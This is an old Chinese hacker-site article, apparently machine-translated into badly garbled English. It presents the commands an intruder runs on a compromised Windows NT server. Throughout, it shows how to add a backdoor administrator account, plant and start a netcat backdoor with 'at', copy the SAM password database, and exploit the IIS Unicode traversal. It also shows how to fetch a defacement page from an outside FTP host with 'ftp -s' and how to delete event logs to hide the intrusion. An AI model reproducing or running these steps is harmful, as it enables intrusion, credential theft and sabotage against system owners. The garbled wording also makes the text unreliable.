The common hacker invades several commonly used orders which needs! ~ |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> common hacker invades 
                  several commonly used orders which needs! ~  Printing

            The common hacker invades several commonly used orders which needs! 
            ~ 
            Www.cshu.net  2002-8-18  fog rain village 

              1: NET 
              So long as you have some IP the user name and the password, that 
              uses IP to make the connection! 
              Here we if you obtain the user is hbx, the password is 123,456. 
              Supposition opposite party IP is 127.0.0.1 
              Net use \\127.0.0.1\ip "123,456" /user: "hbx" 
              The withdrawal order is 
              Net use \\127.0.0.1\ip /delte 
              After under operates you to have to land only then may use Lands 
              method in above 
              ---------------------- 
              How under do we say found a user, because the SA jurisdiction is 
              equal to the system super user 
              We add heibai the user password are lovechina 
              Net user heibai lovechina /add 
              So long as demonstrated orders successfully, then we were allowed 
              to join him the Administrator group 
              Net localgroup Administrators heibai /add 
              ---------------------- 
              Here is says maps opposite party C plate, certainly other also 
              may, so long as existed good Our here maps opposite party C plate 
              the local Z plate 
              Net use z:\\127.0.0.1\ 
              ---------------------- 
              Net start telnet 
              This may open opposite party TELNET service 
              ---------------------- 
              Here is activates the Guest user, guest is NT tacitly approves the 
              user, moreover is unable to delete? Did not know whether like 
              this, I 2,000 was cannot delete it. 
              Net user guest /active:yes 
              ---------------------- 
              Here is changes a user's password, we change the guest password 
              lovechina, other users also may. So long as had the jurisdiction 
              to be good! 
              Net user guest lovechina 
              The net order is really formidable! 
              2:at 
              After the common intruder invades can leave behind the back door, 
              also was a kind of wooden horse, you passed on the wooden horse, 
              how started him? 
              Then the need orders with AT, here supposition you already landed 
              that server. 
              You first fine arrive opposite party time, 
              Net time \\127.0.0.1 
              Will be able to return to time, here supposition time will be 
              12:1, present needs the newly built work, its ID=1 
              At \\127.0.0.1 12:3 nc.exe 
              A here supposition wooden horse, named NC.EXE, this thing has had 
              on opposite party server 
              Here introduced NC, NC is the NETCAT abbreviation, for the 
              convenience input, generally can change name It is a TELNET 
              service, the port is 99. 
              Waited till 12:3 has been allowed to connect the opposite party 99 
              ports Has like this planted the wooden horse to opposite party 
              3:telnet 
              This order extremely practical, it may make the connection with 
              the distant place under, but is normal needs the password, the 
              user, but you gave opposite party to plant the wooden horse, 
              straight one after another arrived the port which this wooden 
              horse opened 
              Telnet 127.0.0.199 
              Like this may link arrives the opposite party 99 ports Then you 
              were allowed to move in opposite party have ordered, this also was 
              the meat chicken 
              4:FTP 
              It may pass to on opposite party loom yours thing, you may apply 
              for the space which supports on FTP to pass on, domestic many is, 
              if really cannot find, I give WWW.51.NET, is good After we apply, 
              it can give the user, the password, as well as FTP server 
              Passes on front on needs to land first, here our supposition FTP 
              server is WWW.51.NET, the user name is HUCJS, the password is 
              654,321 
              Ftp www.51.net 
              He can request the input user, after the success to be able to 
              request the input password 
              ---------------------- 
              Under first said passes on, the supposition you must pass on the 
              document is INDEX.HTM, it is located under C:\, passes to opposite 
              party D:\ 
              Get c:\index.htm d:\ 
              The supposition you must under opposite party C plate INDEX.HTM, 
              get down to under yours loom D plate 
              Put c:\index.htm d:\ 
              5:copy 
              Under I said how duplicates the local document opposite party hard 
              disk to come up, needs to establish the good IP connection only 
              then to be effective. 
              Here we duplicate under local C plate index.htm to 127.0.0.1 C 
              plate under 
              Copy index.htm \\127.0.0.1\\index.htm 
              ---------------------- 
              If you must duplicate under the D plate to change C D, was good! 
              Copy index.htm \\127.0.0.1\d$\index.htm 
              ---------------------- 
              If you must duplicate him in the WINNT table of contents 
              Must the input 
              Copy index.htm \\127.0.0.1\admin$\index.htm 
              Admin$ is winnt 
              ---------------------- 
              Must duplicate opposite party document, while convenient tells 
              everybody NT the backup database to put in x:\winnt\repair\sam. _ 
              sam. _ is the database filename 
              Under on duplicates 127.0.0.1 databases under the local C plate 
              Copy \\127.0.0.1\admin$\repair\sam. _ c:\ 
              ---------------------- 
              6: Set 
              If you ran in a loom, moreover thought is black he (this thought 
              only to be able at special time only then has), certainly his 80 
              ports must start, otherwise did you black look for who. By now 
              needed to use SET to order! 
              Under is the result which I obtains! I analyze it, only is looks 
              for the main page in that. 
              COMPUTERNAME=PENTIUMII 
              ComSpec=D:\WINNT\system32\cmd.exe 
              CONTENT_LENGTH=0 
              GATEWAY_INTERFACE=CGI/1.1 
              HTTP_ACCEPT=*/* 
              HTTP_ACCEPT_LANGUAGE=zh-cn 
              HTTP_CONNECTION=Keep-Alive 
              HTTP_HOST= current &#38470; IP, here originally is demonstrated my IP, 
              is deleted by me 
              HTTP_ACCEPT_ENCODING=gzip, deflate 
              HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; 
              DigExt) 
              NUMBER_OF_PROCESSORS=1 
              Os2LibPath=D:\WINNT\system32\os2\dll; 
              OS=Windows_NT 
              Path=D:\WINNT\system32; D:\WINNT 
              PATHEXT= COM; EXE; BAT; CMD 
              The PATH_TRANSLATED=E:\vlroot main page puts on address, so long 
              as you saw PATH_TRANSLATED= behind is the main page depositing 
              address. Here is E:\vlroot 
              PROCESSOR_ARCHITECTURE=x86 
              PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 

              PROCESSOR_LEVEL=6 
              PROCESSOR_REVISION=0303 
              PROMPT= $$PP G 
              QUERY_STRING=/c+set 
              REMOTE_ADDR=XX.XX.XX.XX 
              REMOTE_HOST=XX.XX.XX.XX 
              REQUEST_METHOD=GET 
              SCRIPT_NAME=/scripts/.. %2f.. /winnt/system32/cmd.exe 
              SERVER_NAME=XX.XX.XX.XX 
              SERVER_PORT=80 
              SERVER_PORT_SECURE=0 
              SERVER_PROTOCOL=HTTP/1.1 
              The SERVER_SOFTWARE=Microsoft-IIS/3.0 opposite party uses IIS/3.0 
              SystemDrive=D: 
              SystemRoot=D:\WINNT 
              Tz=gmt-9 
              USERPROFILE=D:\WINNT\Profiles\Default User 
              Windir=D:\WINNT 
              Pink that line is opposite party main page depositing address, 
              here tells everybody a skill, very stupid skill, but only can use 
              this method to be able 100% found the main page the name, when 
              your DIR this catalogue, certainly can see very multiple file, you 
              may input like this all documents in the browser the XX.XX.XX.XX/ 
              filename, like this so long as saw and XX.XX.XX.XX saw the surface 
              is also entirely alike, then this was the main page name. 
              7: Nbtstat 
              If you sweep to a NT loom, he has opened 136 to 139 port the 
              speech, had to use this order to obtain the user. While convenient 
              tells everybody this is netbios, after obtains the user name to be 
              allowed guessed the password. For example quite simple password, 
              password and user same, all tries, not good explains on the 
              violence! 
              Now the on-line very many NT loom all has operated these ports, 
              you may under the practice, we analyze the result which obtains. 
              The order is 
              Nbtstat -A XX.XX.XX.XX 
              -A certainly wants the capital letter oh. 
              Under is the result which obtains. 
              NetBIOS Remote Machine Name Table 
              Name Type Status 
              --------------------------------------------- 
              Registered Registered Registered Registered Registered Registered 
              Registered Reg 
              Istered Registered Registered Registered 
              MAC Address = 00-e0-29-14-35-ba 
              PENTIUMII <00> UNIQUE 
              PENTIUMII <20> UNIQUE 
              ORAHOTOWN <00> GROUP 
              ORAHOTOWN <1C> GROUP 
              ORAHOTOWN <1B> UNIQUE 
              PENTIUMII <03> UNIQUE 
              INet~Services <1C> GROUP 
              IS~PENTIUMII... <00> UNIQUE 
              ORAHOTOWN <1E> GROUP 
              ORAHOTOWN <1D> UNIQUE 
              .. __MSBROWSE__. <01> GROUP 

              The pink is has landed this system user, is possible you not to 
              know how looked, everybody was sees as soon as fled the numeral, 
              so long as this fled the numeral is the <03> speech, then in front 
              of him was the user. 
              Here user is PENTIUMII. 
              8: Shutdown 
              Has closed opposite party NT server order 
              Shutdown \\IP address t:20 
              After 20 seconds the NT automatic shut-off, after three think can 
              move this order, like this make the very big loss to opposite 
              party, must be the intruder which has the conscience. 
              9: DIR 
              This order any good has not said, but extremely is actually 
              important, he is examines in a table of contents all documents, 
              the folder. 
              You may local try. 
              10: Echo 
              Famous loophole Unicode, this order may simple be black has this 
              loophole the main engine. 
              Our supposition we must "the Nanjing massacre conclusive evidence, 
              any Japanese not have to deny!" Reads in index.htm, some 2 
              methods, everybody has a look to have any difference. 
              The echo Nanjing massacre conclusive evidence, any Japanese does 
              not have to deny! >index.htm 
              The echo Nanjing massacre conclusive evidence, any Japanese does 
              not have to deny! >>index.htm 
              The first meaning covers the index.htm original content, "the 
              Nanjing massacre conclusive evidence, any Japanese does not have 
              to deny!" Interpolates index.htm. 
              The second meaning is "the Nanjing massacre conclusive evidence, 
              any Japanese does not have to deny!" Adds to inside index.htm. 
              ">>" Produces the content will supplement in the document, ">" 
              then original document content cover. 
              Everybody may local try. 
              Possible you to be able to ask that, such simple at night has any 
              amusingly, actually he may use for to download the main page to in 
              opposite party table of contents. 
              1st, first, we need to apply for a free main page space. 
              2nd, in may write under the table of contents with echo to 
              establish the following content the txt document: (Take the 
              chinren server as example.) 
              Open upload.chinaren.com (your FTP server, when application your 
              space provides chamber of commerce to you) 
              Cnhack (you apply when user) 
              Test (you apply when password) 
              Get index.htm c:\inetpub\wwwroot\index.htm (here is downloads your 
              space in index.htm to opposite party c:\inetpub\wwwroot\index.htm) 

              Bye (withdraws from the FTP dialogue, is equal in 98 DOS, 
              withdraws from DOS with EXIT) 
              Concrete procedure: 
              Inputs echo open upload.chinaren.com> c:\cnhack.txt 
              Inputs echo cnhack >> c:\cnhack.txt 
              Inputs echo 39abs >> c:\cnhack.txt 
              Inputs echo get index.htm 
              c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 
              Finally inputs ftp -s:c:\cnhack.txt (to use ftp the -s parameter, 
              in execution file content.) 
              When and so on the order completes, the document already 
              downloaded in the document which assigned to you. 
              Attention: After obtains the document, please delete cnhack.txt. 
              (If does not delete, is very easy to be able to see your password 
              to others.) 
              Remembered wants del c:\cnhack.txt 
              11:attrib 
              This order is establishes file attribute. If you think the black 
              station, but his main page file attribute has established 
              read-only, that very is pitiful, wants to delete him not to be 
              good, wants to cover him not to be good. Pours! But had this order 
              not to fear. 
              Attrib -r index.htm 
              This order is removes the index.htm read-only attribute. 
              If "-" changes "+" is establishes read-only as this document 
              attribute 
              ---------------------- 
              Attrib +r index.htm 
              This order is establishes read-only as the index.htm attribute. 
              12:del 
              When you saw this title may not drop down! Now had to leave 
              127.0.0.1, had to delete the diary, certainly had to delete the 
              diary! Wants to seize. Ha-ha. 
              The NT diary has these 
              Del C:\winnt\system32\logfiles\*. * 
              Del C:\winnt\ssytem32\config\* evt 
              Del C:\winnt\system32\dtclog\*. * 
              Del C:\winnt\system32\* log 
              Del C:\winnt\system32\* txt 
              Del C:\winnt\* txt 
              Del C:\winnt\* log 
              So long as deleted these to be allowed. Some systems NT installs 
              in the D plate or other plates, must alter to C other plates. 



              Original author: OICQ:929230 
              Origin: IntRudeRs 
              Altogether has 212 readers to read this article 

              [Tells friend] 
            Previous article:Homepage wooden horse again display 

            Next article:RedHat Linux 7.0 invasions 

            - this week popular article - related article 
            Microsoft safely announced that, Ms03-009 (MS, patch) 
            Samba SMB/CIFS package of lamination reorganization long-distance 
            buffer overflow loophole
            Microsoft Windows PostMessage API exposition password loophole
            Microsoft Windows help system CNT document: Link long-distance 
            buffer overflow loophole
            Kernel has many flaws (Linux, patch)
            OpenPKG has the dense spoon revelation flaw (Linux, patch) 
            How scratches buttocks ----nt and UINX the system LOG diary article 



      CSHU 
